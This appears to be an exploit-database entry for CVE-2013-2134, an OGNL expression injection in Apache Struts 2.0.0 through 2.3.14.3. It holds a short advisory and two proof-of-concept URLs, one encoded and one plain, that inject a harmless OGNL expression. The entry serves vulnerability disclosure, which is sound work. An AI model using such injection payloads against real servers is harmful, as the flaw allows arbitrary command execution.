Apache Struts - OGNL Expression Injection

Author: Jon Passki
type: remote
platform: multiple
port: 
date_added: 2013-06-05 
date_updated: 2015-10-28 
verified: 1 
codes: CVE-2013-2134;OSVDB-93969 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/60345/info

Apache Struts is prone to a remote OGNL expression injection vulnerability.

Remote attackers can exploit this issue to manipulate server-side objects and execute arbitrary commands within the context of the application.

Apache Struts 2.0.0 through versions 2.3.14.3 are vulnerable.

http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D

http://www.example.com/example/${#foo='Menu',#foo}